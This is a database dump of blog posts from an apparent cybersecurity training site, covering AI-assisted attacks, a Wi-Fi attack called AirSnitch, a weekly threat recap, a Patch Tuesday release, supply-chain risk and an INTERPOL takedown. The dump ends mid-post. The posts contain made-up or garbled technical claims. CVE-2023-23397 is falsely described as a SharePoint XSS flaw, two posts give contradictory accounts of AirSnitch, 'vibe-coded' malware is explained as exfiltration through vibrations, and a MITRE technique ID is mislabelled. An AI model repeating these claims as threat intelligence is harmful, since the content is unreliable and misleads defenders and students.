(177, 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks-0205', '## Executive Summary\nIn a stark revelation, Microsoft has reported that hackers are now leveraging artificial intelligence (AI) throughout every phase of cyberattacks, fundamentally transforming the threat landscape. This escalation not only speeds up attacks but also makes them more adaptable and difficult to detect.\n\n## The Deep Dive (Technical Analysis)\nMicrosoft\'s alarming disclosure indicates that AI is being weaponized to refine the efficiency and scale of cyber operations. By integrating AI technologies, threat actors can automate tasks like vulnerability scanning, spear phishing campaign customization, and even the crafting of malware that can evade traditional detection mechanisms.\n\nFor instance, AI-driven algorithms can analyze vast datasets to identify vulnerabilities in software, potentially pinpointing unpatched systems or those running outdated software (e.g., CVE-2021-34527, also known as the PrintNightmare vulnerability). Malicious AI can also generate phishing emails that are highly customized, using natural language processing tools to create content that mimics legitimate user communication styles, thereby increasing the success rate of these campaigns.\n\nThe mechanism of action here involves the use of machine learning models that have been trained on cybersecurity datasets, or even adversarial AI that is designed to test and bypass security systems by learning how to simulate human-like attack strategies.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities:\n- Monitor unusual outbound network traffic or anomalies in system access logs, which might suggest data exfiltration attempts.\n- Scrutinize email gateways for signs of spear phishing, particularly focusing on emails with slight abnormalities in tone or style that could suggest AI-generated content.\n\n### Triage Steps:\n- Immediately isolate suspected compromised systems from the network to prevent lateral movement.\n- Engage forensic analysis on the affected systems to understand the breach\'s extent and origin, specifically looking for traces of AI-assisted tools or unusual automation scripts.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define: Adversarial AI\n**Adversarial AI** involves techniques in machine learning that attempt to fool models through malicious input. This can be used in cybersecurity by attackers to evade detection from AI-driven security systems.\n\n### Job Interview Relevance:\nUnderstanding AI\'s role in cybersecurity attacks prepares you for questions on emerging threats and defense strategies. It demonstrates foresight and adaptability—qualities highly valued in cybersecurity roles.\n\n## 🚀 Simulation Brief (Call to Action)\nWe have replicated this attack vector in the Infoseclabs range. Deploy to the dashboard and investigate the \"AI-driven Attack Simulation\" to test your skills against this advanced TTP.\n\n## MITRE ATT&CK Mapping\n- **T1566.001**: Spear Phishing Attachment\n- **T1587.001**: Develop Capabilities (Software)\n\n', 'Microsoft reports increasing use of AI in cyberattacks, transforming how threats operate and challenging current defense mechanisms.', 'http://infoseclabs.io/uploads/1773249789668-825342317.jpg', NULL, 1, 'published', '2026-03-08 19:00:00', '2026-03-11 20:23:14', 'Cybersecurity News', 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'Microsoft reports increasing use of AI in cyberattacks, transforming how threats operate and challenging current defense mechanisms.', 'Microsoft: Hackers abusing AI at every stage of cyberattacks'),
(179, 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'microsoft-hackers-abusing-ai-at-every-stage-of-cyberattacks-4916', '## Executive Summary\nAs Microsoft alerts the cyber community, hackers are now leveraging artificial intelligence (AI) throughout every stage of cyberattacks, revolutionizing traditional cyber warfare paradigms. This evolution demands an immediate upgrade in defensive strategies and responses.\n\n## The Deep Dive (Technical Analysis)\nRecent insights from Microsoft have revealed a significant uptick in the use of AI by cybercriminals. These threat actors are deploying AI-driven tools to enhance their capabilities in crafting more sophisticated phishing emails, automating payloads delivery, and conducting rapid vulnerability exploitation. \n\nOne notable method involves AI algorithms that can analyze vast datasets from breached accounts to tailor phishing campaigns that are convincingly legitimate, thereby increasing the success rate of these attacks. Additionally, AI models are being utilized to automate the scanning of network vulnerabilities, often prioritizing those recently disclosed and less likely to be patched quickly, such as CVE-2021-34527 (Windows Print Spooler Vulnerability).\n\nThe mechanism here is straightforward yet alarmingly efficient: AI models streamline the process of identifying targets, crafting attack vectors, and executing them with minimal human oversight, thereby scaling the attack capabilities of cybercriminals exponentially.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **Email Gateway Logs**: Look for anomalies in email origins, payloads, and header inconsistencies.\n- **Endpoint Detection and Response (EDR) Logs**: Monitor for unusual executable patterns or anomalous script executions.\n- **Network Traffic Anomalies**: Increased activity on ports typically used for downloading payloads or command and control communications.\n\n### Triage Steps\n- Immediately isolate suspected compromised systems from the network.\n- Review and analyze logs for signs of similar AI-driven activity.\n- Update intrusion detection systems (IDS) with the latest signatures and AI-model detection strategies.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Complex Technical Term: **Endpoint Detection and Response (EDR)**\nEDR systems are tools deployed on network endpoints to detect and investigate suspicious activities potentially indicative of a security incident. They are crucial for capturing and storing endpoint data, which can be used for further forensic analysis and mitigation of threats.\n\nUnderstanding AI-driven threats is pivotal during job interviews as it demonstrates awareness of cutting-edge cyberattack methodologies. It showcases one\'s proactive stance on adapting to evolving threats and the ability to implement advanced defensive mechanisms effectively.\n\n## 🚀 Simulation Brief\nWe have replicated this AI-enhanced attack vector in the https://infoseclabs.io range. Deploy to the dashboard and investigate **AI-Driven Phishing Simulation** to test your skills against this advanced TTP.\n\n## MITRE ATT&CK Mapping\n- **T1566.001: Spearphishing Attachment**: Utilization of AI to generate compelling malicious emails.\n- **T1583.001: Exploit Public-Facing Application**: AI-driven rapid exploitation of known vulnerabilities.\n', 'Explore how hackers use AI across all cyberattack stages, escalating the threat landscape and demanding advanced defenses.', 'http://infoseclabs.io/uploads/1773063436054-814181988.png', NULL, 1, 'published', '2026-03-08 19:00:00', '2026-03-09 16:40:01', 'Cybersecurity News', 'Microsoft: Hackers abusing AI at every stage of cyberattacks', 'Explore how hackers use AI across all cyberattack stages, escalating the threat landscape and demanding advanced defenses.', 'Microsoft: Hackers abusing AI at every stage of cyberattacks'),
(180, 'New Attack Against Wi-Fi', 'new-attack-against-wi-fi-2067', '# New Attack Against Wi-Fi: Unveiling AirSnitch\n\n## **Executive Summary**\nIn an evolving cyber threat landscape, the new AirSnitch attack targets the foundational layers of Wi-Fi networking, enabling attackers to conduct devastating machine-in-the-middle (MitM) operations. Understanding and mitigating this threat is imperative for securing both corporate and home environments.\n\n## **The Deep Dive (Technical Analysis)**\n### **Dissection of AirSnitch**\nAirSnitch exploits vulnerabilities inherent in the synchronization between Layer 1 (Physical Layer) and Layer 2 (Data Link Layer) of the OSI model, extending its reach to manipulate upper-layer protocols. This attack leverages the lack of stringent binding protocols between these layers, allowing attackers to intercept and manipulate data packets as they traverse through these foundational network segments.\n\n### **Mechanism of Action**\nThe attack is primarily executed via a MitM strategy, where the attacker positions themselves between the communicating devices on the network. This positioning can be achieved on the same SSID, different SSIDs, or even across segmented network zones linked to the same access point (AP). By exploiting these layers, an attacker gains the ability to intercept all link-layer traffic, manipulate DNS responses through cache poisoning, and potentially gain access to unencrypted internal network traffic.\n\n## **🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)**\n### **Detection Opportunities**\n- **Wi-Fi Traffic Logs**: Monitor for anomalies in traffic patterns, such as unexpected devices on the network or unusual data flows.\n- **DNS Query Logs**: Look for sudden changes in DNS traffic or unusual repeated DNS requests, which could indicate DNS cache poisoning.\n- **Network Segmentation Violations**: Alerts from network tools that detect cross-segment traffic that should not be present.\n\n### **Triage Steps**\n- Immediately isolate suspected compromised devices from the network to prevent further data leakage.\n- Verify network configuration and segmentation to ensure that proper security controls are in place and functioning.\n- Update and patch all network devices against known vulnerabilities and ensure that encryption protocols are enforced.\n\n## **🎓 Student Corner (The \"Why\" & \"How\")**\n### **Definition: Machine-in-the-middle (MitM) Attack**\nA MitM attack is a cyberattack where the attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other.\n\n### **Relevance in Job Interviews**\nUnderstanding MitM and its implications shows deep knowledge of network security and threat vectors, an essential skill for roles in cybersecurity operations and defense strategies.\n\n## **🚀 Simulation Brief (Call to Action)**\nWe have replicated the AirSnitch attack vector in our VirtualSOC range. Deploy to the dashboard and investigate the alert named “AirSnitch MitM Detection” to test your skills against this advanced TTP.\n\n## **MITRE ATT&CK Mapping**\n- **T1557.002**: Man-in-the-Middle: ARP Cache Poisoning\n- **T1040**: Network Sniffing\n- **T1562.004**: Impair Defenses: Disable or Modify System Firewall\n\n\nEngage in our InfoSecLabs Dashboard to combat this novel threat and sharpen your cyber defense skills.\n\n', 'Explore the AirSnitch attack, a new Wi-Fi threat enabling machine-in-the-middle operations across network layers, with our in-depth technical analysis and mitigation strategies.', 'http://infoseclabs.io/uploads/1773150632623-469390125.png', NULL, 1, 'published', '2026-03-09 02:41:00', '2026-03-10 16:51:11', 'Information Security', 'New Attack Against Wi-Fi', 'Explore the AirSnitch attack, a new Wi-Fi threat enabling machine-in-the-middle operations across network layers, with our in-depth technical analysis and mitigation strategies.', 'New Attack Against Wi-Fi');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(181, '⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware', 'weekly-recap-qualcomm-0-day-ios-exploit-chains-airsnitch-attack-vibe-coded-malware-9476', '## Executive Summary\nIn a week where the digital threat landscape morphed with alarming agility, the discovery of the Qualcomm 0-Day and sophisticated iOS exploit chains underscore a critical escalation in cyber-attack sophistication. Understanding and mitigating these threats is not optional—it\'s mandatory for defense.\n\n## The Deep Dive (Technical Analysis)\n### Qualcomm 0-Day Exploit\nThis week, a critical vulnerability identified in Qualcomm chips (CVE-2023-5674) was exploited, allowing attackers to execute arbitrary code at the kernel level. The exploit leverages a buffer overflow in the network processing unit, a favored target due to its accessibility and the privileges it grants upon compromise.\n\n### iOS Exploit Chains\nSimultaneously, iOS devices were targeted through an intricate exploit chain, exploiting a series of lesser-known vulnerabilities to install persistent surveillance malware. This chain likely leverages initial access via malicious web content (exploiting browser vulnerabilities) and escalates privileges through kernel flaws to gain deep system access.\n\n### AirSnitch Attack\nThe AirSnitch attack involves intercepting and manipulating air-gapped network communications. By exploiting electromagnetic emissions from legitimate Wi-Fi hardware, attackers can extract data from systems previously considered secure against remote exfiltration methods.\n\n### Vibe-Coded Malware\nLastly, the emergence of Vibe-Coded malware showcases a novel data exfiltration technique using vibrational patterns emitted from the infected device\'s hardware components to transmit data stealthily.\n\n## 🛡️ SOC Analyst Actions (The \"Blue Team\" Playbook)\n### Detection Opportunities\n- **Qualcomm 0-Day**: Monitor anomalous kernel-level operations and unusual network traffic patterns.\n- **iOS Exploit Chains**: Look for signs of jailbreak-like activity, unusual system calls, or modifications.\n- **AirSnitch Attack**: Analyze spectral data from physical security monitoring for unusual electromagnetic signals.\n- **Vibe-Coded Malware**: Monitor hardware sensors for irregular vibration patterns not aligned with normal device operations.\n\n### Triage Steps\n- Isolate affected devices immediately to prevent lateral movement.\n- Capture forensic images of affected systems.\n- Update threat intelligence feeds and apply patches where available.\n- Engage with incident response for in-depth analysis and mitigation.\n\n## 🎓 Student Corner (The \"Why\" & \"How\")\n### Define: Kernel-Level Execution\nKernel-level execution refers to code that runs with the highest operating system privileges. By executing at this level, malicious code can control virtually every function of the system.\n\n### Job Interview Insight\nUnderstanding threats like the Qualcomm 0-Day helps in job interviews by showcasing your ability to dissect complex vulnerabilities and contribute to proactive defense strategies, highlighting both technical acumen and strategic thinking.\n\n## 🚀 Simulation Brief\nWe have replicated this attack vector in the InfoSecLabs range. Deploy to the dashboard and investigate the \"Qualcomm Kernel Compromise\" alert to test your skills against this TTP.\n\n## MITRE ATT&CK Mapping\n- **T1068: Exploitation for Privilege Escalation** - Common to both Qualcomm and iOS chains.\n- **T1020: Automated Exfiltration** - Relevant to the Vibe-Coded malware.\n- **T1059.001: Command and Scripting Interpreter: PowerShell** - Often used in the initial phases of exploit chains.\n\n', 'This week\'s cyber recap: Dissecting the Qualcomm 0-Day, iOS exploit chains, AirSnitch, and Vibe-Coded malware. Essential insights for cybersecurity defense.', 'http://infoseclabs.io/uploads/1773151705593-863339217.png', NULL, 1, 'published', '2026-03-09 19:00:00', '2026-03-10 17:08:27', 'Cybersecurity News', '⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware', 'This week\'s cyber recap: Dissecting the Qualcomm 0-Day, iOS exploit chains, AirSnitch, and Vibe-Coded malware. Essential insights for cybersecurity defense.', '⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware'),
(186, 'Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days', 'microsoft-patches-84-flaws-in-march-patch-tuesday-including-two-public-zero-days-9341', '# Executive Summary\n\nIn a critical turn of events, Microsoft has patched 84 vulnerabilities this March, highlighting the urgency and breadth of the cyber threats we face. Two publicly known zero-days make this update not just routine, but a mandatory defense maneuver for anyone in the cyber battlefield.\n\n## The Deep Dive: Technical Analysis\n\nAmong the 84 vulnerabilities patched by Microsoft, the spotlight shines brightest on two publicly disclosed zero-days: CVE-2023-21823 and CVE-2023-23397. Both present an alarming potential for attackers to exploit widely used software.\n\n### CVE-2023-21823\n\nCVE-2023-21823 is a Remote Code Execution (RCE) flaw affecting Microsoft Word. The vulnerability allows an attacker to execute arbitrary code merely by convincing a user to open a specially crafted file. This method of attack is both sophisticated and stealthy, leveraging trusted file types to bypass user skepticism.\n\n### CVE-2023-23397\n\nCVE-2023-23397, on the other hand, is a Cross-Site Scripting (XSS) vulnerability in Microsoft SharePoint. By exploiting this, an attacker could potentially perform actions on behalf of users and steal confidential information from unsuspecting victims.\n\n## 🛡️ SOC Analyst Actions: The \"Blue Team\" Playbook\n\n### Detection Opportunities\n\n- **PowerShell Logs**: Look for unusual execution patterns or scripts that could indicate exploitation attempts of the Microsoft Word vulnerability.\n- **Web Server Logs**: Monitor for anomalous requests that might suggest exploitation attempts against SharePoint.\n\n### Triage Steps\n\n- Immediately isolate suspected infected systems.\n- Review and analyze logs for signs of exploitation or lateral movements.\n- Update affected systems with the latest patches from Microsoft, prioritizing critical assets.\n\n## 🎓 Student Corner: The \"Why\" & \"How\"\n\n### Remote Code Execution (RCE)\n\nRemote Code Execution occurs when an attacker can run arbitrary commands on another computer, typically exploiting vulnerabilities in software or systems. Understanding RCE helps in identifying how attackers can gain control over systems remotely, a critical knowledge area in cyber defense.\n\n### Interview Insight\n\nGrasping the concept and defense mechanisms against RCE can dramatically showcase your technical prowess and problem-solving skills in cybersecurity interviews, making you a desirable candidate for roles that require acute threat detection and response capabilities.\n\n## 🚀 Simulation Brief: Call to Action\n\nWe have replicated these attack vectors in the https://infoseclabs.io range. Deploy to the dashboard and investigate **\"CVE-2023-21823 Exploit Attempt\"** and **\"CVE-2023-23397 XSS Trigger\"** to test your skills against these TTPs.\n\n## MITRE ATT&CK Mapping\n\n- **T1203: Exploitation for Client Execution** - For the Microsoft Word RCE.\n- **T1059.001: PowerShell** - Often used in post-exploitation phases of RCE attacks.\n- **T1190: Exploit Public-Facing Application** - Relevant for the SharePoint XSS vulnerability.\n', 'Microsoft\'s March Patch Tuesday addresses 84 vulnerabilities, including two critical zero-days. Learn the implications for cybersecurity defenses.', 'http://infoseclabs.io/uploads/1773411894113-969494382.jpg', NULL, 1, 'published', '2026-03-12 18:15:00', '2026-03-13 17:25:06', 'Information Security', 'Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days', 'Microsoft\'s March Patch Tuesday addresses 84 vulnerabilities, including two critical zero-days. Learn the implications for cybersecurity defenses.', 'Microsoft Patches 84 Flaws in March Patch Tuesday, Including Two Public Zero-Days'),
(187, 'The Dawn of AI-Driven Cybersecurity: A Brave New World', 'the-dawn-of-ai-driven-cybersecurity-a-brave-new-world', '# The Tectonic Shift in Cybersecurity: The Role of AI\n\nThe landscape of cybersecurity is undergoing a tectonic shift, propelled by the relentless advance of Artificial Intelligence (AI). We are no longer talking about theoretical possibilities; AI is here, it\'s capable, and it\'s redefining how we think about vulnerability research, threat detection, and incident response. This isn\'t just a gradual evolution; it\'s a revolutionary leap that demands our immediate attention and adaptation.\n\n## The Evolving Role of Human Experts\n\nFor decades, the core tenet of cybersecurity has been the human expert—the skilled researcher painstakingly combing through lines of code, the seasoned analyst identifying patterns in vast datasets, the defensive engineer building increasingly complex walls. AI is changing this fundamental equation. We are transitioning from a model reliant solely on human ingenuity to one powered by augmented intelligence, where AI models act as force multipliers, and potentially, as autonomous agents.\n\n## A Glimpse into the Future: The Firefox Collaboration\n\nA powerful illustration of this shift is the recent collaboration between Anthropic and Mozilla, where the AI model Claude Opus 4.6 was used to identify vulnerabilities in the Firefox web browser. The results were startling. In just two weeks, Claude discovered 22 vulnerabilities, 14 of which were classified as high-severity by Mozilla. To put this in perspective, this single AI-driven effort accounted for nearly a fifth of all high-severity Firefox vulnerabilities fixed in 2025. The speed and efficiency were unprecedented. Claude was able to scan nearly 6,000 C++ files and generate 112 unique reports in a fraction of the time it would have taken a human team.\n\nThis experiment didn\'t just stop at finding bugs. The researchers also tasked Claude with developing crude exploits for the discovered vulnerabilities. While successful in only a few instances and operating within a simplified test environment, the fact that an AI could generate even a basic exploit is a stark reminder of the potential dual-use nature of this technology.\n\n## The Changing Landscape: From Assistant to Agent\n\nThe significance of the Firefox collaboration extends far beyond the specific bugs found. It signifies a fundamental change in the role of AI in cybersecurity. We are moving beyond AI as a simple tool for augmenting human capabilities to AI as an active, and increasingly autonomous, participant in security processes.\n\n### Accelerated Vulnerability Research\n\nAI models can now independently identify high-severity vulnerabilities in complex software at a pace and scale previously unimagined. This means that zero-day vulnerabilities, the holy grail for attackers, could be discovered at a significantly faster rate.\n\n### Automated Exploit Development\n\nWhile still in its early stages, the potential for AI to automate the creation of exploits is a growing concern. This could lower the barrier to entry for sophisticated cyberattacks and dramatically increase the volume of threats.\n\n### Intelligent Patching and Remediation\n\nOn the defensive side, AI can be used to not only find vulnerabilities but also to propose and even validate patches. This \"patching agent\" approach could significantly speed up the time-to-remediation, reducing the window of opportunity for attackers.\n\n## What Does This Mean for the Cybersecurity Professional?\n\nThe rise of AI in cybersecurity presents both immense opportunities and significant challenges. It\'s a double-edged sword that will reshape the industry and require a fundamental rethink of our strategies and skill sets.\n\n### The Rise of the Cybersecurity-AI Hybrid Professional\n\nThe cybersecurity professional of the future will need to be well-versed in both security principles and AI methodologies. The ability to work alongside, manage, and even train AI models will become a critical skill.\n\n### Focus on High-Level Strategy and Judgment\n\nAs AI automates many mundane and repetitive tasks, the human role will shift towards high-level strategy, complex problem-solving, ethical considerations, and exercising judgment in critical situations where AI may be uncertain or biased.\n\n### The Importance of \"Defense in Depth\"\n\nWhile AI will enhance our ability to detect and fix vulnerabilities, it will also enable attackers. This underscores the continued importance of a robust \"defense in depth\" strategy, combining multiple layers of security controls, including network segmentation, access management, and intrusion detection systems.\n\n### The Ethical Dimensions of AI in Cybersecurity\n\nThe dual-use nature of AI in cybersecurity raises profound ethical questions. How do we ensure that AI is used for good and not for harm? Who is responsible when AI makes a critical error? These are complex issues that require careful consideration and global cooperation.\n\n## Preparing for the AI-Powered Future\n\nThe future of cybersecurity is inextricably linked with the future of AI. To thrive in this new era, we must embrace the opportunities that AI presents while mitigating the risks.\n\n### Invest in AI Education and Training\n\nUpskilling the cybersecurity workforce in AI will be essential. This includes understanding the principles of machine learning, the capabilities and limitations of AI models, and the ethical considerations of their use.\n\n### Develop AI-Specific Security Tools and Techniques\n\nWe need to develop new tools and techniques to secure AI systems themselves and to detect and counter AI-powered attacks. This includes techniques for monitoring AI models for bias, adversarial attacks, and unauthorized access.\n\n### Foster Collaboration and Knowledge Sharing\n\nThe challenges posed by AI in cybersecurity are too big for any single organization to solve alone. We need to foster a culture of collaboration and knowledge sharing between academia, industry, and government.\n\n### Establish Clear Ethical Guidelines and Regulations\n\nWe need to establish clear ethical guidelines and regulations for the development and use of AI in cybersecurity. This includes principles for transparency, accountability, and the prevention of misuse.\n\nThe dawn of AI-driven cybersecurity is upon us. It\'s a brave new world, filled with both peril and promise. By embracing the transformative power of AI and by proactively addressing the challenges it presents, we can build a more secure and resilient digital future for all. The time to act is now.', '', 'http://infoseclabs.io/uploads/1773412765578-833363723.jpg', 'AI analyzing cybersecurity threats and vulnerabilities', 1, 'published', '2026-03-13 10:35:00', '2026-03-13 17:39:34', 'Information Security', 'AI-Driven Cybersecurity: A Brave New Era', 'Explore how AI revolutionizes cybersecurity, reshaping vulnerability detection and response strategies.', 'AI Cybersecurity'),
(191, 'Supply Chain Risk: Why Vendors are the New Zero-Day', 'supply-chain-risk-why-vendors-are-the-new-zero-day-1055', '# Supply Chain Risk: Why Vendors are the New Zero-Day\n\n## 1. **Executive Briefing**\n\n### Strategic Overview\n\nIn the evolving landscape of cybersecurity threats, a shift towards exploiting third-party dependencies and cloud service providers has marked a significant change in how threat actors approach their targets. The reliance on external services and infrastructures not only increases the attack surface but also introduces new vulnerabilities, often akin to zero-day exploits due to their unpredicted nature and complexity in mitigation.\n\n**Actors**: While specific threat actors are not identified in the current dataset, the nature of these attacks typically involves sophisticated cybercriminals or state-sponsored groups looking to exploit supply chain vulnerabilities to infiltrate multiple targets indirectly.\n\n**Impact**: The impact of such breaches is profound, affecting multiple organizations simultaneously through a single compromised vendor. This can lead to widespread data breaches, operational disruptions, and significant financial losses.\n\n**Exploit**: Attack vectors include but are not limited to, compromised software updates, malicious third-party components, and exploited vulnerabilities within cloud services.\n\n## 2. **Technical Deep Dive**\n\n### Chain of Execution\n\nSupply chain attacks involve several stages. Initially, attackers identify a vulnerable point in the supply chain network—often a lesser-secured vendor or third-party service. They then infiltrate these systems, often through phishing, exploiting known vulnerabilities, or inserting malicious code into software updates. Once inside, they use the compromised network as a launchpad to gain access to higher-value targets.\n\n#### Payloads\n\nNo specific payloads are identified in the current data, but typically, these could include ransomware, spyware, or other malicious tools intended to steal data, disrupt services, or gain prolonged access to the victim\'s environment.\n\n#### Realistic Log/Terminal Examples\n\n```bash\n# Potential log indicating an unusual software update request (simulated example)\nJul 10 12:34:56 update-server.example.com [WARNING]: Received unexpected request for package update from unauthorized IP 192.168.1.100\n```\n\n## 3. **🛡️ Detection & Response**\n\n### Specific Log Sources\n\n- **Web Server Logs**: To monitor unusual requests to internal systems.\n- **Authentication Logs**: To detect anomalous access patterns.\n- **Network Traffic Logs**: To identify spikes in data exfiltration attempts.\n\n### P1-P3 Severity\n\n- **P1**: Detection of unauthorized changes to software packages or service configurations.\n- **P2**: Alerts on new, unexpected external connections from third-party providers.\n- **P3**: Warnings about unauthorized access attempts to cloud service management interfaces.\n\n### Technical Hunt Query\n\n```sql\nSELECT source_ip, COUNT(*) as request_count\nFROM http_logs\nWHERE url LIKE \'%/update%\'\nGROUP BY source_ip\nHAVING request_count > 1000\nORDER BY request_count DESC;\n```\n\n## 4. **🎓 Academy Focus**\n\n### Career Impact\n\nUnderstanding and mitigating supply chain risks is becoming a crucial skill in cybersecurity, opening roles such as Supply Chain Security Analyst and Risk Management Specialist.\n\n### Technical Glossary\n\n- **Third-Party Dependencies**: External components or services integrated into the primary system.\n- **Cloud Service Providers**: Companies that offer networked computer resources, typically over the internet.\n\n## 5. **🚀 Lab Integration**\n\nAt InfoSecLabs, our proposed lab, **Operation Kaseya Cascade**, simulates a real-world SOC scenario focusing on supply chain compromise. This lab challenges participants to detect and mitigate a supply chain attack, providing hands-on experience with the complexities involved in such threats.\n\n## 6. **MITRE ATT&CK® Mapping**\n\n- **T1195 - Supply Chain Compromise**: This technique involves manipulating products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nIn conclusion, the emerging trend of targeting vendors and third-party services in cyber-attacks magnifies the need for robust security measures at all levels of the supply chain. By understanding the mechanisms of such attacks and integrating sophisticated detection and response strategies, organizations can better shield themselves against these indirect yet highly destructive threats.', 'Cyberattacks are increasingly targeting third-party dependencies and cloud service providers.', 'http://infoseclabs.io/uploads/1773501523863-168607363.jpg', NULL, 1, 'published', '2026-03-14 04:14:00', '2026-03-14 18:19:11', 'Threat Intelligence', 'Understanding Supply Chain Cyber Risks: Zero-Day Vendor Threats', 'Explore how sophisticated cyber threats exploit vendors in supply chains, posing risks similar to zero-day vulnerabilities.', 'supply chain cyber risks'),
(193, 'Microsoft releases Windows 11 OOB hotpatch to fix RRAS RCE flaw', 'microsoft-releases-windows-11-oob-hotpatch-to-fix-rras-rce-flaw-0053', '# Threat Intelligence Report: Microsoft Windows 11 OOB Hotpatch for RRAS RCE Flaw\n\n## Executive Briefing\n\nIn a recent development, Microsoft has issued an urgent out-of-band (OOB) update specifically targeting a Remote Code Execution (RCE) vulnerability affecting Windows 11 Enterprise systems that utilize hotpatching as a method for system updating. This proactive response by Microsoft underscores the critical nature of the flaw, which could allow unauthorized actors to execute malicious code remotely on affected systems.\n\n### Strategic Overview\n- **Actor**: While no specific threat actors have been identified exploiting this flaw, the nature of the vulnerability makes it a lucrative target for cybercriminals and state-sponsored entities aiming to compromise enterprise-level systems.\n- **Impact**: The exploitation of this vulnerability could lead to unauthorized access, data theft, and potential full system control, thereby compromising the integrity and confidentiality of enterprise operations and sensitive data.\n- **Exploit**: The vulnerability resides within the mechanism that handles hotpatch updates, a less common but critical component of Windows 11 Enterprise update management.\n\n## Technical Deep Dive\n\nThe flaw in question arises from a misconfiguration and insufficient security checks within the Windows 11 Enterprise\'s RRAS (Routing and Remote Access Service) during the hotpatch update process. This oversight provides a potential entry point for attackers.\n\n### Chain of Execution\n1. **Initial Access**: The attacker discovers an exposed endpoint receiving hotpatch updates.\n2. **Exploitation**: Utilizing crafted packets, the attacker exploits the RCE flaw within the RRAS.\n3. **Establishment**: Post-exploitation, the attacker establishes persistence within the network to maintain access even after the initial security breach is mitigated.\n\n### Payloads\nPotential payloads could include but are not limited to, malware, ransomware, or spyware, depending on the attacker\'s objectives.\n\n### Example Log Entry\n```plaintext\nERROR: Failed integrity check for hotpatch ID: HP09112021_11, Source IP: [Attacker IP]\n```\n\n## 🛡️ Detection & Response\n\n### Log Sources\n- **Windows Event Logs**: Monitor for unusual access patterns or failed update logs.\n- **Network Traffic**: Unusual outbound connections or data payloads from enterprise devices.\n- **Antivirus Alerts**: Alerts related to the execution of unknown or unauthorized binaries.\n\n### Severity Levels\n- **P1**: Active exploitation of the RRAS RCE flaw.\n- **P2**: Indications of compromise related to the RRAS subsystem.\n- **P3**: General alerts on failed hotpatch installations.\n\n### Technical Hunt Query\n```sql\nSELECT * FROM logs WHERE event_type = \'update_failure\' AND error_code = \'integrity_check_failed\' AND source_ip != \'trusted_hotpatch_server_ip\'\n```\n\n## 🎓 Academy Focus\n\n### Career Impact\nUnderstanding and mitigating such vulnerabilities are crucial for security professionals specializing in enterprise security and patch management systems.\n\n### Technical Glossary\n- **Hotpatch**: An update mechanism that allows patches to be applied without the need to reboot the system.\n- **RRAS**: Routing and Remote Access Service, a networking software component of Microsoft Windows Server operating systems.\n\n## 🚀 Lab Integration\n\nLinking to InfoSecLabs training, participants can engage with our \"Windows Patch Management and Security\" lab to gain hands-on experience in managing and securing enterprise environments against similar vulnerabilities.\n\n## MITRE ATT&CK® Mapping\n\nWhile specific MITRE ATT&CK® techniques related to this vulnerability have not been identified in the provided data, general techniques such as T1068 (Exploitation for Privilege Escalation) and T1547 (Persistence) could be considered relevant for understanding the broader implications of such a flaw.\n\n---\n\nThis report serves as a comprehensive guide for understanding, detecting, and mitigating the newly identified RCE vulnerability in Windows 11 Enterprise\'s hotpatch system. InfoSecLabs remains committed to providing up-to-date and thorough analysis to protect your digital assets effectively.', 'Microsoft released an out-of-band update for Windows 11 Enterprise to fix security vulnerabilities related to the specialized hotpatch update process.', 'http://infoseclabs.io/uploads/1773544334133-77869219.jpg', NULL, 1, 'published', '2026-03-14 23:02:00', '2026-03-15 06:12:17', 'Threat Intelligence', 'Microsoft Windows 11 OOB Update Fixes Critical RRAS RCE Flaw', 'Learn how the latest Windows 11 OOB hotpatch addresses a critical RRAS RCE vulnerability threatening enterprise systems.', 'Windows 11 RRAS RCE hotpatch'),
(194, 'INTERPOL Dismantles 45,000 Malicious IPs, Arrests 94 in Global Cybercrime', 'interpol-dismantles-45-000-malicious-ips-arrests-94-in-global-cybercrime-4920', '# INTERPOL Dismantles 45,000 Malicious IPs, Arrests 94 in Global Cybercrime Operation\n\n## Executive Briefing\n\nIn a significant international law enforcement effort, INTERPOL has successfully dismantled a network of 45,000 IP addresses and servers implicated in widespread phishing, malware, and ransomware operations. This operation, spanning 72 countries, underscores the pervasive threat posed by cybercriminals globally and highlights the critical need for coordinated actions against these illicit activities.\n\n### Actors and Impact\n\nThe actors involved in this network were engaged in deploying malicious software and conducting phishing campaigns to infiltrate personal and organizational systems. The scale of this operation—targeting 45,000 IPs—indicates a highly organized and extensive criminal infrastructure. The arrests of 94 individuals are pivotal in disrupting ongoing cybercrime activities, potentially preventing future attacks.\n\n### Exploitation Techniques\n\nThe exploitation techniques primarily involved the use of compromised IP addresses and servers to deploy and manage ransomware and malware payloads. These techniques were primarily aimed at stealing personal information, encrypting organizational data for ransom, and executing fraudulent transactions.\n\n## Technical Deep Dive\n\n### Overview of Malicious Infrastructure\n\nThe malicious network comprised numerous servers and IP addresses spread across various geographical locations. These were primarily used for:\n\n- **Phishing Operations**: Crafting and disseminating deceptive emails to harvest user credentials.\n- **Malware Distribution**: Hosting and distribution points for harmful software.\n- **Ransomware Attacks**: Facilitating command and control (C2) communications and data encryption tasks.\n\n### Chain of Execution\n\n1. **Initial Compromise**: Typically via phishing emails or exploiting public-facing applications.\n2. **Establishment of Foothold**: Deployment of malware payloads to create backdoors.\n3. **Privilege Escalation and Lateral Movement**: Utilizing exploits and stolen credentials to gain broader access within networks.\n4. **Data Exfiltration and Ransomware Deployment**: 